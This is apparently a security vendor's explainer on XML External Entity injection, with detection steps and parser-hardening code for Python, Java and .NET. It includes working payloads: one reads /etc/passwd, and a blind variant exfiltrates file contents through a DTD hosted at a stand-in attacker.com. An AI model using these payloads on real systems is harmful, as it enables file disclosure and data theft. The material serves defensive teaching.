Severity: high | CWE-611 | OWASP A05:2021 Security Misconfiguration | Detection: moderate

XML External Entity (XXE)

Name: Revaizor
Author: Revaizor

XML External Entity injection exploits misconfigured XML parsers to read local files, perform server-side request forgery, cause denial of service, and in some cases achieve remote code execution.

web api code

Technical Description

XML External Entity (XXE) injection exploits features of the XML specification that allow documents to reference external resources through Document Type Definitions (DTDs). When an XML parser processes untrusted XML input with external entity resolution enabled (which is the default in many parsers), an attacker can define entities that reference local files, internal network resources, or external URLs.

The XML specification supports several entity types that can be abused:

External Entities: Reference files on the local file system or remote URLs.
Parameter Entities: Used within DTDs to define reusable components, enabling data exfiltration through out-of-band channels.
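Nested Entities (Billion Laughs): A chain of entity definitions in which each entity expands to several references to the previous one. XML forbids truly recursive entities, but nesting alone makes the expanded size grow exponentially, causing denial of service through memory exhaustion.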
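
To make the exponential growth concrete, here is a minimal Python sketch that computes the expanded size of a nested-entity chain and confirms the arithmetic on a deliberately tiny document. The function names and the entity names e0..eN are illustrative assumptions, not part of any library. The well-known Billion Laughs payload corresponds roughly to a 3-character string, 10 references per level, and 9 levels.

```python
import xml.etree.ElementTree as ET


def expanded_size(base_len: int, refs_per_level: int, levels: int) -> int:
    """Characters produced when the top-level entity is fully expanded."""
    return base_len * refs_per_level ** levels


def nested_entity_document(base: str, refs_per_level: int, levels: int) -> str:
    """Build a small nested-entity document (keep the parameters tiny)."""
    decls = [f'<!ENTITY e0 "{base}">']
    for i in range(1, levels + 1):
        # Each level refers to the previous level refs_per_level times.
        refs = f"&e{i - 1};" * refs_per_level
        decls.append(f'<!ENTITY e{i} "{refs}">')
    dtd = "\n  ".join(decls)
    return f"<!DOCTYPE r [\n  {dtd}\n]>\n<r>&e{levels};</r>"


# Classic shape: 3 * 10**9 = 3,000,000,000 characters from a payload under 1 KB.
classic = expanded_size(base_len=3, refs_per_level=10, levels=9)

# Tiny, harmless instance: 2 characters, 3 references per level, 2 levels.
tiny_doc = nested_entity_document("ab", 3, 2)
tiny_text = ET.fromstring(tiny_doc).text
```

The payload grows linearly with the number of levels while the expansion grows exponentially, which is why parser-side limits or a complete ban on DTDs are needed rather than a request size limit.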

A basic XXE attack to read a local file:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

When the parser processes this document, it resolves &xxe; by reading /etc/passwd and inserting its contents into the <data> element. If the application returns the parsed XML data in its response, the file contents are disclosed to the attacker.

For blind XXE (where the response is not returned), attackers use out-of-band exfiltration via parameter entities:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<root>&send;</root>

<!-- evil.dtd on attacker's server: -->
<!-- <!ENTITY % combined "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>"> -->
<!-- %combined; -->

XXE is not limited to obvious XML endpoints. Vulnerable parsers are found in:

SOAP services
SVG image uploads
Office document processing (DOCX, XLSX are ZIP archives containing XML)
SAML authentication (XML-based)
RSS/Atom feed processors
Configuration file parsers
PDF generators that accept XML input
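
Because Office documents are ZIP archives of XML parts, a DOCTYPE declaration can hide in any member. The following Python sketch, using only the standard library, lists the XML parts of an uploaded archive that declare a DOCTYPE. The function name, the 64 KiB read limit, and the file-extension filter are assumptions chosen for illustration, and the byte search would miss parts encoded in UTF-16, so treat it as a triage aid rather than a defense.

```python
import io
import zipfile

MAX_HEAD_BYTES = 64 * 1024  # assumed limit; a DOCTYPE must precede the root element


def xml_parts_with_doctype(archive_bytes: bytes) -> list[str]:
    """Return names of XML members whose leading bytes contain a DOCTYPE."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".xml", ".rels")):
                continue
            # Read only the head of each member to avoid inflating huge files.
            with zf.open(info) as member:
                head = member.read(MAX_HEAD_BYTES)
            if b"<!DOCTYPE" in head:
                flagged.append(info.filename)
    return flagged
```

Legitimate DOCX and XLSX parts normally carry no DOCTYPE at all, so any hit is worth inspecting before the file reaches a parser.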

Real-World Impact

XXE vulnerabilities have been exploited in enterprise and government systems:

Facebook (2014): Researcher Reginaldo Silva reported an XXE vulnerability in Facebook’s OpenID handling that could read arbitrary files from the server, earning a $33,500 bounty.
Uber (2016): XXE in Uber’s SAML authentication implementation allowed reading internal files and performing SSRF, enabling access to internal AWS metadata and infrastructure.
US Government (Multiple): NIST has documented numerous XXE vulnerabilities in government web services that process XML data, including SAML-based single sign-on implementations.

XXE combines file disclosure, SSRF, and denial of service into a single vulnerability class. In the worst case, XXE on a PHP application with the expect extension loaded (the expect:// wrapper), or on platforms exposing similarly powerful protocol handlers, can achieve remote code execution. Even without RCE, reading configuration files containing database credentials or API keys frequently enables complete infrastructure compromise.

Detection Methodology

XXE testing should be performed against any endpoint that processes XML:

XML Endpoint Identification: Identify every endpoint that accepts XML input, including SOAP services, REST APIs with Content-Type: application/xml, file upload handlers (SVG, DOCX, XLSX), and SAML endpoints.
Basic Entity Testing: Submit XML payloads containing external entity definitions referencing known files (/etc/passwd on Linux, C:\Windows\win.ini on Windows). Check if file contents appear in the response.
Blind XXE with OOB: When responses do not reflect entity values, use parameter entities to exfiltrate data through DNS lookups or HTTP requests to an attacker-controlled server.
Content-Type Manipulation: For endpoints that expect JSON, change the Content-Type to application/xml and submit an equivalent XML body. Some frameworks accept both formats and may process XML through a vulnerable parser.
Denial of Service Testing: Carefully test for entity expansion attacks (Billion Laughs) to verify parser limits. This should be done cautiously in production environments.
Document Format Testing: Upload SVG, DOCX, and XLSX files containing XXE payloads in their internal XML structures.
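
The Content-Type manipulation and response-checking steps above can be sketched in Python as follows. This is a minimal illustration for authorized testing only: the function names, the root element name, and the marker strings are assumptions, and the request object is built but never sent.

```python
import json
import urllib.request
import xml.etree.ElementTree as ET

# Assumed heuristics: typical first line of /etc/passwd and of win.ini.
FILE_MARKERS = ("root:x:0:0:", "; for 16-bit app support")


def json_to_xml_body(json_text: str, root_tag: str = "root") -> bytes:
    """Convert a flat JSON object into an equivalent XML request body."""
    data = json.loads(json_text)
    root = ET.Element(root_tag)
    for key, value in data.items():
        ET.SubElement(root, key).text = str(value)
    return ET.tostring(root, encoding="utf-8", xml_declaration=True)


def build_xml_probe(url: str, json_text: str) -> urllib.request.Request:
    """Build (but do not send) a POST that resubmits a JSON body as XML."""
    return urllib.request.Request(
        url,
        data=json_to_xml_body(json_text),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


def looks_like_file_disclosure(response_body: str) -> bool:
    """Check a response for strings that suggest a local file was read."""
    return any(marker in response_body for marker in FILE_MARKERS)
```

If the endpoint answers the XML probe the same way it answers the JSON original, an XML parser is reachable and the entity tests above apply to it.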

How Revaizor Discovers This

Revaizor’s AI agents systematically test for XXE across the full attack surface:

Comprehensive XML Surface Discovery: Revaizor identifies all XML processing endpoints, including non-obvious ones like file upload handlers that process SVG, DOCX, or XLSX files, SAML authentication flows, and API endpoints that accept XML even when documented as JSON-only.
Content-Type Fuzzing: Revaizor tests whether endpoints that expect non-XML formats (JSON, form data) will also process XML input. This discovers XXE in parsers that are silently active but not intended to be exposed.
Multi-Technique Exploitation: Revaizor tests both classic XXE (with response reflection) and blind XXE (using out-of-band exfiltration). It automatically escalates from file read to SSRF, testing internal network access and cloud metadata endpoints.
Document-Based XXE: Revaizor generates malicious SVG, DOCX, and XLSX documents with embedded XXE payloads and uploads them to file processing endpoints, testing a vector that many automated scanners overlook entirely.
Parser-Specific Payloads: Revaizor identifies the XML parser in use (libxml2, Xerces, MSXML, etc.) and crafts parser-specific payloads that account for known behavior differences, entity handling quirks, and protocol support variations.

Remediation

The primary defense is disabling external entity resolution in XML parsers:

# Python - defusedxml (recommended)
import defusedxml.ElementTree as ET
tree = ET.parse(xml_input)  # Safe - external entities disabled

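# Python - standard library
import xml.etree.ElementTree as ET
# Note: xml.etree.ElementTree does not resolve external entities in Python 3
# (a reference to one raises ParseError), but it still expands internal entities.

# Python - lxml requires explicit configuration
from lxml import etree
parser = etree.XMLParser(resolve_entities=False, no_network=True, load_dtd=False)
tree = etree.parse(xml_input, parser)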

// Java - disable external entities in DocumentBuilderFactory
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

// .NET - XmlReaderSettings
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(inputStream, settings);
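
A quick way to confirm how a parser treats external entities is to feed it the basic payload and observe the result. The sketch below does this for Python's standard library parser, which is expected to raise ParseError instead of reading the file. The helper name is an assumption for illustration; the same check can be adapted to whichever parser an application actually uses.

```python
import xml.etree.ElementTree as ET

PAYLOAD = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>"""


def stdlib_rejects_external_entity(xml_bytes: bytes) -> bool:
    """Return True if ElementTree refuses to resolve the external entity."""
    try:
        ET.fromstring(xml_bytes)
    except ET.ParseError:
        # The reference to the external entity is reported as undefined.
        return True
    return False
```

A check like this fits well in a regression test suite, so that a later change of parser or parser options cannot silently re-enable entity resolution.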

Comprehensive XXE prevention:

Disable DTDs Entirely: The safest approach is to disable DTD processing completely (disallow-doctype-decl). This prevents all XXE variants including denial of service.
Use Safe Parsers: In Python, use defusedxml. In Java, use parsers configured with OWASP’s recommended settings. In .NET, set DtdProcessing.Prohibit.
Use Non-XML Formats: Where possible, use JSON or other data formats that do not have an equivalent to external entities. Migrate SOAP services to REST/JSON.
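Input Validation: Reject XML input that contains <!DOCTYPE, <!ENTITY, or SYSTEM/PUBLIC keywords as an additional defense layer. Pattern matching on raw bytes can be bypassed with alternative encodings such as UTF-16, so it does not replace secure parser configuration.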
Web Application Firewall: Deploy WAF rules to detect and block XXE payloads in HTTP traffic, providing defense in depth.
SAML Library Updates: If using SAML for authentication, ensure the SAML library properly disables external entities in its XML parser. Many SAML XXE vulnerabilities stem from default-insecure parser configurations.
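
As one way to combine the "disable DTDs" and "input validation" items, the following Python sketch rejects any document that declares a DOCTYPE before it reaches application code. It relies on the standard library Expat binding, so the check runs after character decoding and is not fooled by alternative encodings. The exception and function names are assumptions for illustration, and the approach mirrors what hardened wrappers do rather than replacing them.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML declares a DOCTYPE."""


def assert_no_doctype(data: bytes) -> None:
    """Parse data with Expat and fail as soon as a DOCTYPE is declared.

    Malformed XML still raises xml.parsers.expat.ExpatError.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called when Expat reaches the DOCTYPE, before entities are used.
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(data, True)
```

Calling assert_no_doctype on each untrusted document before handing it to the application's own parser turns every XXE variant described above into an early, explicit rejection.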

Related Glossary Terms

Burp Suite
OWASP Top 10
Server-Side Request Forgery (SSRF)
